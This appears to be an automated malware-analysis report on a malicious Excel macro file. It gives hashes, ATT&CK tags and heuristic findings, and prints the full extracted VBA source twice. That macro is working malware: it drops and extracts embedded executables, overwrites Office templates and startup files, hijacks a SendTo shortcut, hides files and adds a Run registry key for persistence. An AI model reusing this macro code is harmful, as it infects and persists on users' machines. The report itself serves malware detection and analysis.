Office (OLE) malware analysis — malicious · 0ac78685e9224f58

MALICIOUS

Office (OLE)

286.5 KB Created: 2012-07-11 08:11:21 Authoring application: Microsoft Excel First seen: 2015-09-30

MD5: a27399d5c7b6af4ab261ea52d3cb5fd6 SHA-1: 98b91d50a8e34d107d71d8a82838d77d1963a573 SHA-256: 0ac78685e9224f58cb68327b9ffa98af42ace96fdd5207e55a26aaff9a45dec1

160 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains VBA macros that leverage WScript.Shell to create directories, copy files, and execute downloaded payloads. Specifically, it attempts to extract contents from 'c:\cab.cab' and copy 'c:\normal.dot' to the user's templates directory, indicating a likely attempt to establish persistence or download further malicious content. The use of WScript.Shell and CreateObject points to a macro-based downloader.

Heuristics 4

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Set w = CreateObject("wscript.shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set fso = CreateObject("scripting.filesystemobject")
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2808 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	2808 bytes
SHA-256: `071361a99a1431d40e0c3041987210a7a2134c5eb423dbe3dcb87fe5192b4347`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Module1" Private Sub createcabfile() Dim ch As Byte On Error Resume Next Set fso = CreateObject("scripting.filesystemobject") Set w = CreateObject("wscript.shell") myfolder = w.SpecialFolders("Templates") & "\Software\" If Not fso.folderexists(myfolder) Then fso.createfolder myfolder End If For i = 1 To Workbooks.Count If Workbooks(i).Name = "normal.xlm" Then Workbooks(i).Close fso.deletefile Application.StartupPath & "\normal.xlm" End If Next For i = 1 To Workbooks.Count If Workbooks(i).Name = "norma1.xlm" Then GoTo a1 End If Next cabfile = "c:\cab.cab" If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then fso.Delete cabfile Open cabfile For Binary Access Write As #1 For i = 1 To 150 hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value n = 1 m = InStr(hv, " ") Do While m > 0 ch = CByte(Mid(hv, n, m - n)) Put #1, , ch n = m + 1 m = InStr(n, hv, " ") Loop Next Close #1 w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True fso.deletefile cabfile fso.copyfile "c:\normal.dot", myfolder, True Set word = CreateObject("word.application") ntpath = word.NormalTemplate.Path & "\" word.Quit fso.copyfile "c:\normal.dot", ntpath, True fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\" Set fold = fso.getfolder(w.SpecialFolders("SendTo")) For Each ff In fold.Files If InStr(ff.Name, "软盘") > 0 Then Set lnk = w.CreateShortcut(fold.Path & "\" & ff.Name) lnk.TargetPath = "c:\sendto.exe" lnk.IconLocation = "shell32.dll,6" lnk.Save GoTo e2 End If Next e2: fso.deletefile "c:\normal.dot" fso.deletefile "c:\norma1.xlm" fso.deletefile "c:\internet.exe" w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe", "internet.exe" w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe" End If Workbooks.Open Application.StartupPath & "\norma1.xlm" ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Workbooks("norma1.xlm").Sheets("(m1)_(m2)_(m3)").Columns(2) Workbooks("norma1.xlm").Save fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True a1: fso.deletefile "c:\excel.txt" Application.DisplayAlerts = False For i = 1 To ThisWorkbook.Sheets.Count If Left(ThisWorkbook.Sheets(i).Name, 3) = "模块表" Then ThisWorkbook.Sheets(i).Delete End If Next Application.DisplayAlerts = True ThisWorkbook.Saved = True End Sub

SHA-256: 071361a99a1431d40e0c3041987210a7a2134c5eb423dbe3dcb87fe5192b4347

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Module1"
Private Sub createcabfile()
Dim ch As Byte
On Error Resume Next
Set fso = CreateObject("scripting.filesystemobject")
Set w = CreateObject("wscript.shell")
myfolder = w.SpecialFolders("Templates") & "\Software\"
If Not fso.folderexists(myfolder) Then
fso.createfolder myfolder
End If
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "normal.xlm" Then
Workbooks(i).Close
fso.deletefile Application.StartupPath & "\normal.xlm"
End If
Next
For i = 1 To Workbooks.Count
If Workbooks(i).Name = "norma1.xlm" Then
GoTo a1
End If
Next
cabfile = "c:\cab.cab"
If Not fso.fileexists(Application.StartupPath & "\norma1.xlm") Then
fso.Delete cabfile
Open cabfile For Binary Access Write As #1
For i = 1 To 150
hv = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value
n = 1
m = InStr(hv, " ")
Do While m > 0
ch = CByte(Mid(hv, n, m - n))
Put #1, , ch
n = m + 1
m = InStr(n, hv, " ")
Loop
Next
Close #1
w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True
w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True
w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True
fso.deletefile cabfile
fso.copyfile "c:\normal.dot", myfolder, True
Set word = CreateObject("word.application")
ntpath = word.NormalTemplate.Path & "\"
word.Quit
fso.copyfile "c:\normal.dot", ntpath, True
fso.copyfile "c:\norma1.xlm", Application.StartupPath & "\", True
fso.copyfile "c:\internet.exe", fso.getspecialfolder(1) & "\"
Set fold = fso.getfolder(w.SpecialFolders("SendTo"))
For Each ff In fold.Files
If InStr(ff.Name, "软盘") > 0 Then
Set lnk = w.CreateShortcut(fold.Path & "\" & ff.Name)
lnk.TargetPath = "c:\sendto.exe"
lnk.IconLocation = "shell32.dll,6"
lnk.Save
GoTo e2
End If
Next
e2:
fso.deletefile "c:\normal.dot"
fso.deletefile "c:\norma1.xlm"
fso.deletefile "c:\internet.exe"
w.Run "%COMSPEC% /c attrib +s +h c:\setflag.exe", 0, True
w.Run "%COMSPEC% /c attrib +s +h c:\sendto.exe", 0, True
w.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internet.exe", "internet.exe"
w.regdelete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Internat.exe"
End If
Workbooks.Open Application.StartupPath & "\norma1.xlm"
ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Columns(2).Copy Workbooks("norma1.xlm").Sheets("(m1)_(m2)_(m3)").Columns(2)
Workbooks("norma1.xlm").Save
fso.copyfile Application.StartupPath & "\norma1.xlm", myfolder, True
a1:
fso.deletefile "c:\excel.txt"
Application.DisplayAlerts = False
For i = 1 To ThisWorkbook.Sheets.Count
If Left(ThisWorkbook.Sheets(i).Name, 3) = "模块表" Then
ThisWorkbook.Sheets(i).Delete
End If
Next
Application.DisplayAlerts = True
ThisWorkbook.Saved = True
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.